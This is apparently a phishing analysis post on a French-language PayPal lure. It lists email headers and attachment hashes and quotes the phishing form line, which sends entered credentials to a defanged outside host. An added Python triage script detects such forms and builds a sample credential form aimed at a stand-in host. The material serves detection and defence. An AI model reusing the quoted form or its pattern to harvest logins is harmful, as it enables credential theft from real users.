Phishing: Attention ! Votre compte PayPal a ete limite

A new phishing email is being used to spread HTML files that contain fake PayPal login forms:

Phishing Email

Header details:

Received: from ns3.komvos.gr (ns3.komvos.gr [88.198.65.153])
Received: by ns3.komvos.gr (Postfix, from userid 48)
Subject: Attention ! Votre compte PayPal a été limité !
From: Service Paypal
Date: Mon,  4 Jun 2012 13:00:12 +0300 (EEST)
Content-Disposition: attachment; filename="Informations Compte Paypal .zip"

There is a ZIP file attached:

File: Informations Compte Paypal .zip
Size: 5391 bytes
MD5: 2C573252C917A4E4FFC2138E48B50F2B
SHA1: 28B36A51D9215F143AC449984A27A74D520679B7
SHA256: 5E45F7E1988AE2F1B8721226D88AB7DD9EB8A395FB4C501E145554F49655C8C9
SHA384: EE4D4201B65716A986162D43F289FA695263B9BC3EB839F08F185F2B1A1DEC777C68439D91C068DAA80768712B53D80E
SHA512: BA111FCB751F40837E58F50F76314380E8D52FD97B5E98F7855D813433C8FFCDDD26AF58DEE7894F4BC4D2AF53760268FBE25C650FCDC55B0796F6D316E5147A

The file extracted from the ZIP is an HTML file:

File: Informations Compte Paypal .html
Size: 22525 bytes
MD5: 0500506DEDA37FBC1A7CD19C22173764
SHA1: AB7F78D2A70460418E858E4783F5D3F5376CF2E2
SHA256: F81D8AAA2996D7FB13320FD6F05C37AA1A1CD7BA7BCD29823B03731ED3A067E2
SHA384: 7EEA087DEEEE72203E81F7F606CDAD90F4F5EB1233A95DC692556AFE6AA5B94426E7B84881101F21BF84730B0E132EE3
SHA512: 0B858A75C10EBDBFC9A6D7CDE4C1AB34199B67A51999AB59E85086182C93EF66C20956BA62E68647C27B91704D5A2D4E2EA68749C77ED39DF4AB1F679245BE18

From this HTML code:

<form action="hxxp:// byrongoldworks .com /mainbody.php" method="post" name="zaz" onsubmit="return verif_formulaire()">

The form's action attribute shows that the sensitive data entered in the form is sent to:

hxxp:// byrongoldworks .com /mainbody.php
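
The same check can be scripted for mail triage. The following is an added example, not code from the original post: it opens a ZIP attachment in memory, parses each HTML member without rendering it, and lists the forms whose action is an absolute URL. The names FormCollector, triage_zip and build_sample are hypothetical, and the sample data uses the reserved domain collector.example.test.

```python
import io
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormCollector(HTMLParser):
    """Record each <form>: action, method, and whether it has a password input."""
    def __init__(self):
        super().__init__()
        self.forms, self.current = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.current = {"action": (a.get("action") or "").strip(),
                            "method": (a.get("method") or "get").lower(), "password": False}
            self.forms.append(self.current)
        elif tag == "input" and self.current and (a.get("type") or "").lower() == "password":
            self.current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self.current = None

def triage_zip(zip_bytes, max_size=1_000_000):
    """List forms in a ZIP's HTML members that submit to an absolute (remote) URL."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            is_html = info.filename.lower().endswith((".html", ".htm"))
            if not is_html or info.file_size > max_size:  # size cap: zip-bomb guard
                continue
            parser = FormCollector()
            parser.feed(zf.read(info).decode("utf-8", errors="replace"))
            for form in parser.forms:
                url = urlparse(form["action"])
                if url.hostname:  # a file opened from disk has no server of its own
                    findings.append({"file": info.filename, "method": form["method"],
                                     "host": url.hostname.replace(".", "[.]"),  # defanged
                                     "path": url.path, "credential_form": form["password"]})
    return findings

def build_sample():
    """Constructed sample ZIP: one credential form posting off-box, one local form."""
    html = ('<form action="http://collector.example.test/mainbody.php" method="post">'
            '<input type="password" name="pw"></form><form action="#q"></form>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("constructed sample .html", html)
    return buf.getvalue()
```

A finding with `credential_form` set to true on an HTML attachment is a strong signal, because a file opened from disk has no legitimate reason to post a password to a remote host.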

Report from URLVoid:

URLVoid Report for byrongoldworks .com